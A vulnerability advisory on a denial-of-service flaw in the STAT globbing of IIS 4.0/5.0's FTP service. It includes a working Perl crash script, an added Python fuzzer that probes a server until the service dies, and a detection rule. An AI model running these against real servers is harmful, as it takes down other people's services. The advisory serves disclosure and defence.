COMMAND

Microsoft FTP Service DoS using STAT Globbing

SYSTEMS AFFECTED

IIS 5.0
IIS 4.0

PROBLEM

H D Moore [http://www.digitaloffense.net/] found the following:

The Microsoft FTP service is vulnerable to a Denial of Service attack in the
STAT command. This DoS can be triggered by a remote attacker using either a
valid user account or the anonymous account, which is enabled by default.
Once exploited, all services running under the inetinfo.exe process will
terminate. On IIS 5.0 and above these services are supposed to restart; on
IIS 4.0 the services must be restarted manually. This vulnerability appears
to be impossible to exploit to gain a remote command shell. Versions other
than 4.0 and 5.0 were not tested.

Details
=======

This vulnerability was discovered in November 2001 by a "fuzzer" script I
wrote to audit FTP daemons for problems in the globbing functionality. This
script created and sent random arguments to the "STAT" command consisting of
various combinations of globbing characters. The original fuzzer had to be
modified to use the Windows glob characters instead of the normal Unix set.
Within 20 seconds the script had caused an access violation on a fully
patched IIS server.

An example request which can cause the crash:

    STAT ?*<240 x X>

The crash occurs when a memchr call is passed a pointer which dereferences
to a NULL. It may be possible to overwrite this memory with an arbitrary
path and use this exploit to obtain a directory listing, but all attempts so
far have failed, and constantly restarting IIS and retrying was getting old.

Scripts
=======

DoS Proof of Concept

#!/usr/bin/perl -w
##################
##################
#
# URL:   http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./msftp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft FTP service contains a vulnerability in the STAT
# command with the pattern-matching (glob) code. This vulnerability
# could be exploited to execute a Denial of Service attack. This
# affects IIS 4.0 and 5.0 and requires the attacker to be able to
# access the service either through a valid user account or via the
# anonymous login which is enabled by default. The DoS attack will
# bring down all services running under IIS (the inetinfo.exe process).
#
# IIS 4.0 must be manually restarted to restore normal operation. IIS 5.0
# will automatically restart the crashed services, but any users connected
# to the service at the time of exploitation must reconnect.
#
# At this time, there seems to be a slim-to-none chance of being able to
# execute arbitrary code through this vulnerability.
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
#

use strict;
use Net::FTP;

# The target host is the only argument
my $target = shift() || die "usage: $0 <target ip>\n";

# Anonymous login is enabled by default on the affected servers
my $user = "anonymous";
my $pass = "crash\@burn.com";

# Filler appended to the glob pattern; 240 bytes is enough to trigger the crash
my $exp = ("A" x 240);

print ":: Trying to connect to target system at: $target...\n";

# Net::FTP->new returns undef and puts the reason in $@ on failure
my $ftp = Net::FTP->new($target, Debug => 0, Port => 21)
    || die "could not connect: $@";
$ftp->login($user, $pass) || die "could not login: " . $ftp->message;
$ftp->cwd("/");

print ":: Trying to crash the FTP service...\n";

# quot() sends the raw command; the server is expected to die before replying
$ftp->quot("STAT *?" . $exp);
$ftp->quit;

Credits
=======

The following people helped in one form or another:

* bind
* rkl
* halvar
* tsnoop
* ah / da (vulnhelp)

SOLUTION

Patch available at
http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
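The Details section describes the method (random combinations of Windows glob characters sent as STAT arguments until the daemon falls over) but not the script, and the proof of concept above only sends the one known-bad pattern. The block below is an added example, written for this page in Python rather than the advisory's Perl, and is not H D Moore's code: it regenerates STAT arguments of the same shape, probes a server with each one while distinguishing "server rejected the argument" from "server went away", and adds the check a defender would run over captured control-channel commands. Assumptions, all marked in the comments: that the Windows wildcard set is `*`, `?`, `<`, `>` and `"`; the filler byte, the length ranges and the random seed; and a 200-byte threshold for the defender-side check, since the advisory only states that 240 bytes crash the server and not the minimum.

```python
"""
Added example (not part of H D Moore's advisory or his msftp_dos.pl):
a STAT-globbing fuzzer in the style the Details section describes, plus a
control-channel check a defender can run over captured FTP commands.
"""
import ftplib
import random

# Windows wildcard set.  '*' and '?' are the documented Win32 wildcards;
# '<', '>' and '"' are the DOS_STAR / DOS_QM / DOS_DOT forms that the NT
# filesystem name-matching code also accepts.  Assumption: this is what the
# advisory means by "the Windows glob characters".
WIN_GLOB = '*?<>"'
FILLER = "A"            # assumption; the PoC uses "A", the Details text uses "X"


def gen_stat_args(seed, count, max_glob=8, max_fill=300):
    """Build `count` random STAT arguments from a fixed seed: a run of glob
    metacharacters followed by a run of filler, mirroring 'STAT ?*<240 x X>'.
    Length ranges are assumptions, chosen to bracket the 240-byte trigger."""
    rng = random.Random(seed)
    out = []
    for _ in range(count):
        globs = "".join(rng.choice(WIN_GLOB) for _ in range(rng.randint(1, max_glob)))
        out.append(globs + FILLER * rng.randint(0, max_fill))
    return out


def is_stat_glob_dos(command_line, min_len=200):
    """Defender-side check over one FTP control-channel command line.
    Flags a STAT whose argument contains a glob metacharacter and is long.
    min_len=200 is an assumption set below the 240-byte trigger; the advisory
    does not say how short an argument can be and still crash the server."""
    parts = command_line.strip().split(" ", 1)
    if len(parts) != 2 or parts[0].upper() != "STAT":
        return False
    arg = parts[1]
    return any(c in WIN_GLOB for c in arg) and len(arg) >= min_len


def probe_stat(host, arg, port=21, user="anonymous",
               password="crash@burn.com", timeout=10):
    """Log in, send one raw STAT, report whether the server survived.
    Returns {'alive': bool, 'reply': text}."""
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        reply = ftp.sendcmd("STAT " + arg)   # raw command, like Net::FTP quot()
        ftp.quit()
        return {"alive": True, "reply": reply}
    except ftplib.Error as e:
        # 4xx/5xx reply: the server disliked the argument but answered, so it is up
        return {"alive": True, "reply": str(e)}
    except (EOFError, OSError) as e:
        # Connection closed, reset or timed out: consistent with inetinfo.exe dying.
        # Confirm with a fresh connect before concluding; a firewall drop looks the same.
        return {"alive": False, "reply": repr(e)}


def fuzz(host, seed=1, rounds=50):
    """Send generated arguments until one kills the service; return it or None."""
    for arg in gen_stat_args(seed, rounds):
        result = probe_stat(host, arg)
        print(f"{'OK ' if result['alive'] else 'DIE'} len={len(arg):4d} {arg[:24]!r}...")
        if not result["alive"]:
            return arg
    return None


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target ip>")
    hit = fuzz(sys.argv[1])
    print("crashing argument:", repr(hit) if hit else "none in this run")
```

Run it only against a host you are authorised to crash; on IIS 4.0 someone has to restart the service by hand afterwards, as the advisory notes. The defender-side `is_stat_glob_dos` is deliberately a two-condition rule (glob metacharacter plus length) so that an ordinary `STAT README.TXT` or a bare `STAT` does not fire.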